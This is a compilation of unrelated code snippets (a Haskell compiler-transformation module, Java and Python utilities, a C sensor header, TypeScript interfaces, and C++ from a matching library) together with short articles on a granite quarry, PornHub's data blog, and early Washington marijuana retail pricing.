show) cs instance ShowP b => ShowP (Program b) where showp n (Program fs) = concat $ map (showp n) fs -- The transformations explained in the comments above. -- FUSE -- -- Fuse can be implemented as a generalized fold operation, where only -- the list constructor is modified. Note that this works bottom up, -- so needs to be run multiple times to perform nested fusing. -- fuse p = Program $ foldProgram LetPrim LetLoop cons [] p where cons h@(LetLoop i1 fs1) t@((LetLoop i2 fs2):t') = case i1 == i2 of True -> (LetLoop i1 (fs1 ++ fs2)) : t' False -> h:t cons a b = a:b -- INTERCHANGE -- -- This is focused on a particular loop. It needs some more context -- to be applied properly. -- interchange (LetLoop i [LetLoop j p]) = (LetLoop j [LetLoop i p]) interchange l = l -- ELIMINATE -- Eliminate requires escape analysis, which is non-local information. -- Note that when we create a single form from a high level -- description, it is known exactly which of the arrays are output and -- which are temporary. However, when we start fusing loops, this -- information is no longer accurate, as an output of one stage might -- be fed into another stage and become an intermediate value. So we -- do not bother tracking the original information and reconstruct it -- instead. -- Elimination works in two steps. Create the elimination list.. intermediates p = catMaybes $ toList $ fmap intermediate' $ annotate p where intermediate' (ctx, Let c@(Cell a is) _ cs) = case escapes a ctx of False -> Just a True -> Nothing intermediate' (ctx, Ret _) = Nothing -- .. then modify the array dimensionality in a next step. -- FIXME: This broke when refactoring types, but will no longer be -- used in favor of gathering an indirect per array annotation -- dictionary. 
-- eliminate p = fmap (fmap txCell) p where -- isIntermediate a = elem a $ intermediates p -- txCell c@(Cell a is) = -- if isIntermediate a then (Cell a []) else c eliminate = undefined -- -- CONTEXT ANNOTATION -- Note that there is no context available in the Functor / Foldable / -- Traversable instances. Since the standard container view is so -- convenient, we stick to it as the main abstraction, and provide a -- mechanism that tags each element with its context. annotate :: Program b -> Program (Context b, b) -- Each element has two pieces of information attached: 1) the loop -- nesting context, and 2) the "stack" associated to the sequential -- execution context, describing what happens next. type Stack b = [[Form b]] type Context b = ([Index],Stack b) -- Note that it is more convenient to define a single traversal -- routine that annotates everything we know, and define projections -- that strip away the unneeded data, e.g. annotate' proj = (fmap (\(a,b) -> (proj a, b))) . annotate annotate_i = annotate' fst annotate_s = annotate' snd -- To implement the annotation, a Reader is used to contain the -- current context during traversal. The code is split up into the -- concrete annotation wrapper.. annotate p = p' where p' = runReader (annotateM pushi pushp add_context p) ([],[]) pushp p = withReader (\(is, ps) -> (is, p:ps)) pushi i = withReader (\(is, ps) -> (i:is, ps)) add_context b = do ctx <- ask return (ctx, b) -- ..and the abstract traversal. The traversal itself is the mutual -- recursion pattern associated directly with the 4 constructors, -- sprinkled with pushi, pushp to accumulate context data that can then -- be picked up by f. 
annotateM pushi pushp add_context (Program p) = fmap Program $ forms p where form (LetPrim b) = do b' <- add_context b return $ LetPrim b' form (LetLoop i p) = do p' <- pushi i $ forms p return $ LetLoop i p' forms [] = do return [] forms (f:fs) = do f' <- pushp fs $ form f fs' <- forms fs return (f':fs') -- ESCAPE ANALYSIS -- Given (Context Let, Let) at each binding site, the context can be -- used to perform escape analysis. -- An array escapes the current block if it is referenced after the -- current block has finished executing. This can be expressed in -- terms of the execution stack. escapes :: Grid -> Context Let' -> Bool escapes a (_,(_:future_after_current)) = referenced a $ concat future_after_current escapes _ _ = error "escapes: empty stack" -- To check referencing, check each primitive's dependency list. Note -- that this has quadratic complexity in the most common case: a -- temporary, non-escaping binding, as the entire future needs to be -- traversed to determine that there are no references. Is there a -- better way? referenced :: Grid -> [Form Let'] -> Bool referenced a fs = or $ map checkPrim prims where prims = toList $ Program $ fs checkPrim p = or $ map checkCell $ cells p checkCell (Cell a' _) = a' == a cells (Ret rs) = rs cells (Let _ _ rs) = rs -- ACCUMULATOR DISCOVERY -- Similar to how escape analysis can identify grid dimensions that -- can be flattened into a local variable, accumulator discovery -- identifies dimensions in escaping variables that can be flattened -- because they are used only as accumulators. -- ... -- Tests -- Note: 2019/6/2: Taking out the wrappers to generate the language. -- For documentation purposes, it makes more sense to use the -- constructors directly. -- See Loop.hs for the parallel development of the monadic Language, -- which currently needs to diverge structure-wise from what is in -- here. 
test_val = Program $ [LetLoop (Index 0) $ [LetPrim $ Let (Cell (Grid 2) [Def $ Index 0]) "opc" [Cell (Grid 0) [Ref $ Index 0], Cell (Grid 1) [Ref $ Index 0] ], LetPrim $ Ret $ [Cell (Grid 2) [Ref $ Index 0]] ]]
/** * Writes the specified text value to the file * @param path File path * @param value The value to write * @return The result of the operation (true = successful write, false = write failed) */ public static boolean writeValue(String path, String value) { if (value == null) value = ""; try (FileOutputStream stream = new FileOutputStream(new File(path))) { stream.write(value.getBytes()); stream.flush(); return true; } catch (FileNotFoundException e) { Log.e(TAG_WRITE, String.format("The file %s does not exist", path)); return false; } catch (IOException e) { Log.e(TAG_WRITE, String.format("Error while writing file %s", path)); return false; } }
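The essential contract here is that the stream is always closed and success is reported as a boolean rather than an exception. A hypothetical Python counterpart of the same contract, using a context manager to guarantee the close:

```python
def write_value(path, value):
    # The with-block closes the file even if write() raises
    if value is None:
        value = ""
    try:
        with open(path, "w") as f:
            f.write(value)
        return True
    except OSError:
        return False

print(write_value("write_value_demo.txt", "hello"))          # True
print(write_value("/no_such_dir_abc123/file.txt", "hello"))  # False
```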
/** * Application event that represents configuration file has been changed * * @author Code2Life * @see DynamicConfigPropertiesWatcher */ @Getter @Setter public class ConfigurationChangedEvent extends ApplicationEvent { /** * The diff properties, keys are normalized, values are newest values */ private Map<Object, Object> diff; ConfigurationChangedEvent(Map<Object, Object> diff) { super(diff.keySet()); this.diff = diff; } }
/** * Creates a class out of a given array of bytes with a ProtectionDomain. * * @param name binary name of the class, null if the name is not known * @param b a byte array of the class data. The bytes should have the format of a * valid class file as defined by The JVM Spec * @param offset offset of the start of the class data in b * @param bLength length of the class data * @param cl ClassLoader used to load the class being built. If null, the default * system ClassLoader will be used * @param pd ProtectionDomain for new class * @return class created from the byte array and ProtectionDomain parameters * * @throws NullPointerException if b array of data is null * @throws ArrayIndexOutOfBoundsException if bLength is negative * @throws IndexOutOfBoundsException if offset + bLength is greater than the * length of b */ public Class<?> defineClass(String name, byte[] b, int offset, int bLength, ClassLoader cl, ProtectionDomain pd) { Objects.requireNonNull(b); if (bLength < 0) { throw new ArrayIndexOutOfBoundsException(); } Class<?> result = defineClass0(name, b, offset, bLength, cl, pd); VMLangAccess access = VM.getVMLangAccess(); access.addPackageToList(result, cl); return result; }
On May 14, 1889, the North Carolina Granite Company was founded in Surry County by Thomas Woodroffe. It has been in continuous operation since. Now known as the North Carolina Granite Corporation, it is the world’s largest open-faced granite quarry. The site has produced granite for many high-rise buildings and even for the Singapore subway system. Its granite has been used to create several notable structures including the Fort Knox Bullion Depository in Kentucky, the Wright Brothers Monument at Kitty Hawk, the Centennial Olympic Plaza in Atlanta and the World War II Memorial in Washington, D.C. The granite is also popular for curbing, especially in northern states that use salt in winter, since salt breaks down concrete curbs in short order. Other uses for the product include tombstones and mausoleums. Waste granite, the small bits that are left over from extraction and from fabrication, is crushed for road construction and landscape use. Located on the Ararat River near Mt. Airy, the active quarry covers more than 200 acres and is estimated to have enough granite to continue extracting it at the current rate for 500 more years. The quarry is the source of Mt. Airy’s “Granite City” nickname. For more about North Carolina’s history, arts and culture, visit Cultural Resources online. To receive these updates automatically each day, make sure you subscribe by email using the box on the right, and follow us on Facebook, Twitter and Pinterest.
def _vdc_get_by_id(self, arg_vdc_id): ret_vdc_id = 0 ret_vdc_dict = dict() api_params = dict(cloudspaceId=arg_vdc_id,) api_resp = self.decs_api_call(requests.post, "/restmachine/cloudapi/cloudspaces/get", api_params) if api_resp.status_code == 200: ret_vdc_id = arg_vdc_id ret_vdc_dict = json.loads(api_resp.content.decode('utf8')) else: self.result['warning'] = ("vdc_get_by_id(): failed to get VDC by ID {}. HTTP code {}, " "response {}.").format(arg_vdc_id, api_resp.status_code, api_resp.reason) return ret_vdc_id, ret_vdc_dict
package com.artemis.generator.model.type; import java.lang.reflect.Type; import java.util.ArrayList; import java.util.List; /** * Model of a class, agnostic to the source-code generator. * <p> * @author <NAME> */ public class TypeModel { public String name = "unnamed"; public String packageName = "com.artemis"; public List<MethodDescriptor> methods = new ArrayList<MethodDescriptor>(); public List<FieldDescriptor> fields = new ArrayList<FieldDescriptor>(); public Type superclass; public Type superinterface; // currently supports only 1 interface. /** Add method to model. */ public void add(MethodDescriptor method) { methods.add(method); } /** * Get method that matches signature exactly. * @return {@code method}, or {@code null}. */ public MethodDescriptor getMethodBySignature(String signature) { for (MethodDescriptor method : methods) { if (signature.equals(method.signature(true, true))) { return method; } } return null; } public void add(FieldDescriptor field) { fields.add(field); } }
/* This writes to the RX_DESC_WPTR register for the specified receive * descriptor ring. */ void efx_nic_notify_rx_desc(struct efx_rx_queue *rx_queue) { efx_dword_t reg; unsigned write_ptr; while (rx_queue->notified_count != rx_queue->added_count) { efx_build_rx_desc(rx_queue, rx_queue->notified_count & EFX_RXQ_MASK); ++rx_queue->notified_count; } wmb(); write_ptr = rx_queue->added_count & EFX_RXQ_MASK; EFX_POPULATE_DWORD_1(reg, FRF_AZ_RX_DESC_WPTR_DWORD, write_ptr); efx_writed_page(rx_queue->efx, &reg, FR_AZ_RX_DESC_UPD_DWORD_P0, rx_queue->queue); }
// repo: MCHAMOUXCAPG/TeamSpirit
import { Column } from "material-table"; export enum questionType { slider, fiveIcons, twoIcons, stars, } export interface ISurveyQuestion { number: number; question: string; type: questionType; images: string[]; } export interface IQuestionStatus { status?: string; valid: boolean; touched: boolean; } export interface IQuestionResponse { note: number; number: number; surveyCode: string; User: string | null; } export interface IValidationCode { code: string; User: string | null; } export interface ICurrentSurveyResult { Period: { StartDate: string; EndDate: string; }; Completed: string; CurrentResult: number; HistoricResult: number; } export interface IValidationUser { Email: string; Password: string; } export interface IResultsByUsers { Average: number; Notes: { Number: number; Note: number; SurveyCode: string }[]; User: string; } export interface IResultsByQuestions { Average: number; Notes: { Note: number; User: string }[]; QuestionNumber: number; } export interface ITeam { Frequency: number; Name: string; //TeamName Num_mumbers: number; StartDate: string; // format "2020-01-31" } export interface ITeamDTO { Frequency: number; Name: string; //TeamName Num_mumbers: number; StartDate: string; // format "2020-01-31" Surveys?: any; Users?: any; } export interface IRoleDTO { Id?: number; Name: string; UserID?: number; } export interface IUser { Id: number; Full_name: string; Email: string; Password: string; Role: IRole; Teams: ITeamDTO[]; } export interface IUserDTO { Id?: number; Full_name: string; Email: string; Password: string; Role: IRole; Teams: ITeamDTO[]; } export interface IUserTable { columns: Array<Column<IUserData>>; } export interface IUserData { Id: number; Full_name: string; Email: string; Password?: string; Role: string; Teams: string; tableData?: { id: number }; } export interface ITeamTable { columns: Array<Column<ITeamData>>; } export interface ITeamData { Frequency: number; Name: 
string; //TeamName Num_mumbers: number; StartDate: string; // format "2020-01-31" tableData?: { id: number }; } export interface IRole { Id: number; Name: string; } export interface IHistoric { endDate: string; startDate: string; totalAverage: number; }
-- repo: MarinPostma/AOC2021
{-# LANGUAGE DeriveDataTypeable #-} {-# OPTIONS_GHC -fno-cse #-} module Lib ( entry ) where import System.Console.CmdArgs import Data.List import Control.Exception import Data.Void import Data.Char (digitToInt) import Data.Ratio import Data.Bits import Numeric import Data.Bifunctor import Debug.Trace import Control.Monad import Control.Arrow import Day4 import Day5 import Day6 import Day7 import Day8 import Day9 import Day10 import Day11 import Day12 import Day13 import Day14 import Day15 newtype Aoc = Aoc { day :: String } deriving (Show, Data, Typeable) aoc = Aoc { day = def &= help "The day you want to run" } entry :: IO () entry = runCmd . day =<< cmdArgs aoc runDay f = print . f . lines =<< getContents runCmd :: String -> IO () runCmd "day1_1" = runDay $ day1 0 . map read runCmd "day1_2" = runDay $ day1 2 . map read runCmd "day2_1" = runDay day2_1 runCmd "day2_2" = runDay day2_2 runCmd "day3_1" = runDay day3_1 runCmd "day3_2" = runDay day3_2 runCmd "day4_1" = day4_1 . lines =<< getContents runCmd "day4_2" = day4_2 . lines =<< getContents runCmd "day5_1" = day5_1 . lines =<< getContents runCmd "day5_2" = day5_2 . lines =<< getContents runCmd "day6_1" = day6_1 . lines =<< getContents runCmd "day6_2" = day6_2 . lines =<< getContents runCmd "day7_1" = day7_1 . lines =<< getContents runCmd "day7_2" = day7_2 . lines =<< getContents runCmd "day8_1" = day8_1 . lines =<< getContents runCmd "day8_2" = day8_2 . lines =<< getContents runCmd "day9_1" = day9_1 . lines =<< getContents runCmd "day9_2" = day9_2 . lines =<< getContents runCmd "day10_1" = day10_1 . lines =<< getContents runCmd "day10_2" = day10_2 . lines =<< getContents runCmd "day11_1" = day11_1 . lines =<< getContents runCmd "day11_2" = day11_2 . lines =<< getContents runCmd "day12_1" = day12_1 . lines =<< getContents runCmd "day12_2" = day12_2 . lines =<< getContents runCmd "day13_1" = day13_1 . lines =<< getContents runCmd "day13_2" = day13_2 . 
lines =<< getContents runCmd "day14_1" = day14_1 . lines =<< getContents runCmd "day15_1" = day15_1 . lines =<< getContents runCmd "day15_2" = day15_2 . lines =<< getContents runCmd _ = print "unknown day!" day1 :: Int -> [Int] -> Int day1 win input = length $ filter id (uncurry (<) <$> zip t (tail t)) where t = map sum $ transpose $ map (($ input) . drop) [0..win] day2_1 :: [String] -> Int day2_1 input = product $ foldl f [0, 0] $ map words input where f [x, y] ["forward", n] = [x + read n, y] f [x, y] ["down", n] = [x, y + read n] f [x, y] ["up", n] = [x, y - read n] f _ cmd = error $ "invalid command" ++ cmd !! 1 day2_2 :: [String] -> Int day2_2 input = product $ take 2 $ foldl f [0, 0, 0] $ map words input where f [x, y, aim] ["forward", n] = [x + read n, y + aim * read n, aim] f [x, y, aim] ["down", n] = [x, y, aim + read n] f [x, y, aim] ["up", n] = [x, y, aim - read n] f _ cmd = error $ "invalid command" ++ cmd !! 1 day3_1 :: [String] -> Int day3_1 = uncurry (*) . join bimap readBin . findMostLeastCommon day3_2 :: [String] -> Int day3_2 input = product $ map (readBin . ($ input)) [filterBits 0 (fst . findMostLeastCommon), filterBits 0 (snd . findMostLeastCommon)] readBin = fst . head . readInt 2 (`elem` "01") digitToInt filterBits :: Int -> ([String] -> String) -> [String] -> String filterBits _ _ [input] = input filterBits i screen input = filterBits (succ i) screen (filter (\xs -> xs !! i == screen input !! i) input) findMostLeastCommon :: [String] -> (String, String) findMostLeastCommon = foldl appendBit ("", "") . avg . transpose . map f where f = map digitToInt avg = map $ \xs -> sum xs % length xs appendBit (g, e) x = if x >= 1 % 2 then (g ++ "1", e ++ "0") else (g ++ "0", e ++ "1") compute x = x * complement x
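The `day1` function above counts increases of sliding-window sums by zipping shifted copies of the input (`win = 0` means a single measurement, `win = 2` a three-measurement window). The same trick in a quick sketch, checked against the published Advent of Code 2021 day 1 sample:

```python
def day1(win, xs):
    # Sum over a sliding window of width win+1, then count strict increases
    sums = [sum(xs[i:i + win + 1]) for i in range(len(xs) - win)]
    return sum(a < b for a, b in zip(sums, sums[1:]))

sample = [199, 200, 208, 210, 200, 207, 240, 269, 260, 263]
print(day1(0, sample))  # 7 single-measurement increases
print(day1(2, sample))  # 5 three-measurement-window increases
```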
def const_cgmap(ctxstr, cgmapfile, readdepth=4): cgmap = {} with open(cgmapfile) as infile: for chrom in ctxstr.keys(): cgmap[chrom] = ['-' for _ in range(len(ctxstr[chrom]))] for line in infile: line = line.strip().split() chrom = line[0] pos = int(line[2]) - 1 context = line[3] level = float(line[5]) depth = int(line[7]) if context in ['CG', 'CHG', 'CHH'] and depth >= readdepth: cgmap[chrom][pos] = level return cgmap
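The column layout `const_cgmap` assumes (1-based position in column 3, context in column 4, methylation level in column 6, read depth in column 8) can be checked on a single made-up record; the line below is hypothetical sample data, not taken from a real CGmap file:

```python
line = "chr1 C 101 CG CG 0.85 17 20"  # hypothetical CGmap record
fields = line.split()
chrom = fields[0]
pos = int(fields[2]) - 1   # convert to 0-based, as const_cgmap does
context = fields[3]
level = float(fields[5])
depth = int(fields[7])
keep = context in ("CG", "CHG", "CHH") and depth >= 4  # default readdepth
print(chrom, pos, level, keep)  # chr1 100 0.85 True
```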
def seek(self, frame): if frame != 0: raise EOFError
/** * Created by Administrator on 2014/7/27 0027. */ public class Candy { public int candy(int[] ratings) { if (null == ratings) { return 0; } int sum = ratings.length; int last = 1; for (int i = 0; i < ratings.length;) { if (i - 1 >= 0 && ratings[i] > ratings[i-1]) { last++; } else { last = 1; } int j = i + 1; for (; j < ratings.length && ratings[j-1] > ratings[j]; j++) { } if (j == i + 1) { sum += last - 1; } else { int calculatedByReverse = j - i; sum += (0 + calculatedByReverse - 1) * (j - i) / 2; if (last > calculatedByReverse) { sum += (last - calculatedByReverse); } last = 1; } i = j; } return sum; } public int candy2(int[] ratings) { int[] incs = new int[ratings.length]; for (int i = 1, inc = 1; i < ratings.length; ++i) { if (ratings[i] > ratings[i-1]) { incs[i] = inc++; } else { inc = 1; } } for (int i = ratings.length - 2, inc = 1; i >= 0; --i) { if (ratings[i] > ratings[i+1]) { incs[i] = Math.max(inc++, incs[i]); } else { inc = 1; } } int sum = ratings.length; for (int i = 0; i < incs.length; i++) { sum += incs[i]; } return sum; } public static void main(String[] args) { System.out.println(new Candy().candy(new int[]{4,2,3,4,1})); } }
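The two-pass idea in `candy2` ports directly: one left-to-right sweep rewarding increasing runs, one right-to-left sweep rewarding decreasing runs, keeping the larger reward at each position. A sketch, checked against the sample from `main` above (minimal hand-out is [2,1,2,3,1], total 9):

```python
def candy(ratings):
    n = len(ratings)
    incs = [0] * n
    # Left-to-right: reward increasing runs
    inc = 1
    for i in range(1, n):
        if ratings[i] > ratings[i - 1]:
            incs[i] = inc
            inc += 1
        else:
            inc = 1
    # Right-to-left: reward decreasing runs, keeping the larger of the two
    inc = 1
    for i in range(n - 2, -1, -1):
        if ratings[i] > ratings[i + 1]:
            incs[i] = max(inc, incs[i])
            inc += 1
        else:
            inc = 1
    # Everyone gets one candy plus their earned increments
    return n + sum(incs)

print(candy([4, 2, 3, 4, 1]))  # 9
```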
#ifndef __SENSORS_H #define __SENSORS_H #include <stdint.h> #include "rfreport.h" enum value_type { SENSOR_INT, SENSOR_FLOAT, SENSOR_STRING, }; struct sensor_measurement { const char *property_name; const char *unit; enum value_type type; uint8_t precision; // How many decimals are valid int int_val; float float_val; char *char_val; }; struct sensor { // Common config char type[16]; char *mqtt_topic; // Which MQTT topic to use to report this sensor uint16_t rh_sensor_id; // Which RadioHead sensor ID corresponds to this sensor int poll_delay; // Driver specific config int gpio; int power_gpio; int output_gpio; // Internal state int enabled:1; unsigned int timer_id; void *driver_data; int (*poll)(struct sensor *, struct sensor_measurement *); int (*shutdown)(struct sensor *); struct sensor *next; }; void sensors_init(void); void sensors_report(struct sensor *sensor, const struct sensor_measurement *values, int n_values); void sensors_handle_rf_report(const struct rf_sensor_report *report); void sensors_shutdown(void); int bme280_init(struct sensor *sensor); int bme280_poll(struct sensor *sensor, struct sensor_measurement *out); int dht_init(struct sensor *sensor); int dht_poll(struct sensor *sensor, struct sensor_measurement *out); int ds18b20_init(struct sensor *sensor); int ds18b20_poll(struct sensor *sensor, struct sensor_measurement *out); int mh_z19_init(struct sensor *sensor); int mh_z19_poll(struct sensor *sensor, struct sensor_measurement *out); int gpio_ultrasound_init(struct sensor *sensor); int gpio_ultrasound_poll(struct sensor *sensor, struct sensor_measurement *out); int soil_moisture_init(struct sensor *sensor); int soil_moisture_poll(struct sensor *sensor, struct sensor_measurement *out); #endif
// repo: bacali95/ngx-json-table
export * from './lib/lib/settings'; export * from './lib/ngx-json-table.component'; export * from './lib/ngx-json-table.module';
// Copyright 2022 PyMatching Contributors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
//     http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.

#include "pymatching/sparse_blossom/flooder/graph_fill_region.h"

#include "pymatching/sparse_blossom/flooder/graph.h"
#include "pymatching/sparse_blossom/flooder_matcher_interop/varying.h"

using namespace pm;

GraphFillRegion::GraphFillRegion()
    : blossom_parent(nullptr),
      blossom_parent_top(this),
      alt_tree_node(nullptr),
      radius((0 << 2) + 1),
      shrink_event_tracker() {
}

GraphFillRegion::GraphFillRegion(GraphFillRegion &&other)
    : blossom_parent(other.blossom_parent),
      blossom_parent_top(other.blossom_parent_top == &other ? this : other.blossom_parent_top),
      alt_tree_node(std::move(other.alt_tree_node)),
      radius(std::move(other.radius)),
      shrink_event_tracker(std::move(other.shrink_event_tracker)),
      match(std::move(other.match)),
      blossom_children(std::move(other.blossom_children)),
      shell_area(std::move(other.shell_area)) {
}

bool GraphFillRegion::tree_equal(const GraphFillRegion &other) const {
    if (alt_tree_node != other.alt_tree_node || radius != other.radius ||
        blossom_children.size() != other.blossom_children.size() || shell_area != other.shell_area) {
        return false;
    }
    if (blossom_children.empty())
        return true;
    for (size_t i = 0; i < blossom_children.size(); i++) {
        if (blossom_children[i].edge != other.blossom_children[i].edge)
            return false;
        if (!blossom_children[i].region->tree_equal(*other.blossom_children[i].region))
            return false;
    }
    return true;
}

bool GraphFillRegion::operator==(const GraphFillRegion &rhs) const {
    return tree_equal(rhs);
}

bool GraphFillRegion::operator!=(const GraphFillRegion &rhs) const {
    return !(rhs == *this);
}

void GraphFillRegion::add_match(GraphFillRegion *region, const CompressedEdge &edge) {
    match = Match{region, edge};
    region->match = Match{this, edge.reversed()};
}

void GraphFillRegion::cleanup_shell_area() {
    for (auto &detector_node : shell_area) {
        detector_node->reset();
    }
}

void GraphFillRegion::clear_blossom_parent() {
    blossom_parent = nullptr;
    do_op_for_each_descendant_and_self([&](GraphFillRegion *descendant) {
        descendant->blossom_parent_top = this;
        for (DetectorNode *n : descendant->shell_area) {
            n->region_that_arrived_top = this;
            n->wrapped_radius_cached = n->compute_wrapped_radius();
        }
    });
}

void GraphFillRegion::clear_blossom_parent_ignoring_wrapped_radius() {
    blossom_parent = nullptr;
    do_op_for_each_descendant_and_self([&](GraphFillRegion *descendant) {
        descendant->blossom_parent_top = this;
        for (DetectorNode *n : descendant->shell_area) {
            n->region_that_arrived_top = this;
        }
    });
}

void GraphFillRegion::wrap_into_blossom(GraphFillRegion *new_blossom_parent_and_top) {
    blossom_parent = new_blossom_parent_and_top;
    do_op_for_each_descendant_and_self([&](GraphFillRegion *descendant) {
        descendant->blossom_parent_top = new_blossom_parent_and_top;
        for (DetectorNode *n : descendant->shell_area) {
            n->region_that_arrived_top = new_blossom_parent_and_top;
            n->wrapped_radius_cached = n->compute_wrapped_radius();
        }
    });
}

bool GraphFillRegion::operator<=(const GraphFillRegion &rhs) const {
    const GraphFillRegion *r = this;
    while (r != nullptr && r != &rhs) {
        r = r->blossom_parent;
    }
    return r == &rhs;
}

bool GraphFillRegion::operator<(const GraphFillRegion &rhs) const {
    return this != &rhs && (*this <= rhs);
}

bool GraphFillRegion::operator>(const GraphFillRegion &rhs) const {
    return rhs < *this;
}

bool GraphFillRegion::operator>=(const GraphFillRegion &rhs) const {
    return rhs <= *this;
}
/**
 * Tests whether the multiplication {@code x * y} will cause long overflow.
 */
public static boolean isOverflowMultiply(long x, long y) {
    long r = x * y;
    long ax = Math.abs(x);
    long ay = Math.abs(y);
    if ((ax | ay) >>> 31 != 0) {
        if (((y != 0) && (r / y != x)) || (x == Long.MIN_VALUE && y == -1)) {
            return true;
        }
    }
    return false;
}
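For comparison, the same check can be written directly in Python, where integers never overflow, so we can compute the exact product and test it against the 64-bit range. This is an illustrative sketch, not part of the original snippet; the constants stand in for Java's signed `long` bounds:

```python
INT64_MIN, INT64_MAX = -(2**63), 2**63 - 1  # range of Java's signed 64-bit long

def is_overflow_multiply(x: int, y: int) -> bool:
    """Return True if x * y would overflow a signed 64-bit long."""
    product = x * y  # Python ints are arbitrary precision, so this is exact
    return not (INT64_MIN <= product <= INT64_MAX)
```

Because the product is exact, this version needs no special case for `Long.MIN_VALUE * -1`, which the Java code has to handle separately since the division-based round-trip test misses it.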
In early October, we called on PornHub to seize the opportunity and build the greatest data-fueled brand blog of all time. A few months later, they’ve followed through, creating one of the most detailed cultural studies of human sexuality we’ve seen since William Masters and Virginia Johnson teamed up in the late ’50s. If you feel squeamish about reading a porn blog, don’t be. PornHub Insights is (pretty much) safe for work and dishes out some graduate-level research. Content marketers, take note: This is how to capture and publish the right data. PornHub receives an average of 35 million visitors daily, meaning there’s plenty of information to mine. The Insights blog now offers aggregate data that reveals fascinating stats about its users, including most popular search terms, time spent per visit, and the quantity of videos watched per visit. They’ve even broken down the numbers across the globe, comparing the viewing habits of different countries in a series of visually engaging infographics. From a content strategy perspective, this is data done right. From a sociological standpoint, the blog presents a commitment to data only rivaled by academic and peer-reviewed research. If you think I’m blowing smoke, compare PornHub’s subject matter to studies from Harvard Business School or the newly launched academic journal Porn Studies. PornHub’s results are fascinating. In Canada, for example, users spend the most time on the site in January. Monday registers the most visits, while Sunday receives the least. Also, on Canada Day, the country’s annual July 1 holiday, the site reported a decrease in traffic in every province. Want to read about similar details in the Philippines? You can. Malta? No problem. It turns out that trends about popular months and days for watching adult videos appear to hold true across borders and oceans. 
And if you need a fun fact to talk about at parties: Even though PornHub traffic decreases in almost every country for major worldwide events and holidays, the site reported an 8 percent increase in Japan on Christmas. (There’s a joke there—probably about the versatility of Toshiba products. I’m just not going to be the one who makes it.)

Why exactly is PornHub publishing this blog? Because the data may be compelling enough to shake off some of the stigma associated with pornography, which could make the site more appealing to mainstream advertisers. Clearly, all kinds of people are watching porn, and the value of potential ad dollars is all about understanding these demographics. Aside from cultural data, PornHub Insights can also tell us quite a bit about how users are watching pornography, specifically when it comes to accessing “content” on video game consoles, tablets, and mobile devices. Those on Xbox, PS4, and Nintendo Wii view more pages and stay on the site longer than computer users. It’s not surprising that 52 percent of American PornHub traffic in 2013 came from mobile devices, an increase of 5 percentage points from 2012. Tablet usage also surged, while desktop traffic fell by 8 percentage points.

Images via Pornhub.com/Insights

To complement the blog, PornHub recently rolled out PornMD, a real-time scroll of popular search terms on the site. The site only features the text of the searches and some cool maps, but it also includes a number of phrases I wouldn’t feel comfortable saying in front of my nana, so be careful about visiting it at work. PornHub VP Corey Price told Esquire, “When we originally saw the data from the live searches we actually projected it on the wall of our office for a couple of months as everyone found it incredibly insightful and interesting.” It’s the modern take on Gawker’s big board—just a little bit raunchier. All these trends and stats are pieces to a puzzle of useful information.
The more we know about that puzzle, the more we can understand how pornography fits into the overall digital experience. PornHub has created a unique brand publication that melds data with controversy and intrigue in a fascinating way. And if brands learn to emulate PornHub, more potent data will be coming soon. (We’ll leave the “That’s what she said” joke to you.) What’s the deal with The Content Strategist? At Contently, storytelling is the only marketing we do, and it works wonders. It could for you, too. Learn more.
“There will be a ton of froth in the water during the first three months. Folks will be squeezing each other and not making many friends.” Yes, Washington marijuana growers will have product ready for sale in the first week of July in time for the first wave of 20-30 stores receiving state licenses. Exactly which day those first stores will open, how much you’ll be able to buy and how much it will cost the consumer is still mostly an open question, but there will be legal weed on store shelves. But expect it to sell out fast. “There’s just no way it’s not going to sell out,” said Attila Soos, the owner of Verdavanti, one of the largest growers licensed so far. He will have product to offer stores for that first week, he said. “We’ll have product for retailers as long as they are licensed. We expect things to start rolling out July 1st, but it is safe to assume that not all retailers will receive their license July 1st, so you’ll likely see our products being rolled out in weekly phases across the state.” And there’s a tough, fast-paced, free-market battle going on right now as you read this story. Soos added: “We’re at a point where one gentleman wrote to every single producer and processor that he wanted to buy product, and he kept everyone in the contact list. The next retailer simply hit the reply-all button and said ‘I’ll match whatever you guys offer to him and on top of it I’ll add 15 percent.’ “There’s no real feasible way to meet the demand at this point.” And, according to many conversations we’ve had with growers and hopeful retailers, prices per gram will range from $15 to $25 (with some higher spikes and brief lows, possibly at $12 a gram) during those first few days and weeks, but then level out at … about the same range. While we’ve heard of some growers trying to lock in very high prices (we heard of one pitch to sell a pound at $6,500 to the retailer, who then has to tack on his/her costs and taxes), those are aberrations. 
By and large, from what we’ve heard, growers and retailers are looking long-term and don’t want to anger each other or the consumer. “We’re pioneers in the industry,” said John Evich, a retail hopeful. “We want to be among the first to open. We want to benefit the future of the industry, because my research tells me that if we charge everyone $25 a gram, people are going to be pissed off at the industry and say that retail is a joke.” Evich is part of retail hopeful Top Shelf Cannabis in Bellingham, owned by Thomas Beckely. He believes the store will be among the first licensed in the state. “We want to offer a wide variety of prices and quality that’s affordable,” Evich said. “I’ve had a lot of people tell me, ‘We’re just going to keep buying from the black market or from medical.’ And that’s what we don’t want to see. I want to see this come out, and the retail be looked at, and (Initiative) 502 be looked at, as a good thing and a fair thing.” Quick note on buying pot: All dried marijuana will be sold to consumers at one-ounce or less sizes, so “a 1/4” is … well … 7.08 grams. “An 1/8th” is 3.54 grams and so on. Some retailers will sell an 1/8th or a 1/4 for less than if you bought each gram separately. And, of course, a wide variety of edibles and other infused products will also, eventually, be available. “Our market research shows a low- to mid-level out-the-door pricing structure of $12-15 dollars a gram, with some higher-level product going as high as $25,” said Sam Calvert, a retail hopeful in Spokane. “However, the higher price is a limited-target market, and will not support a retail going concern. Our informed (grower/processors) know our business model and are looking for sustainability in the marketplace.” Calvert said his retail operation, Green Star Cannabis, will be among the first wave of licensees in July. We chatted with him via email. “We do not have an opening date but an opening window of dates. 
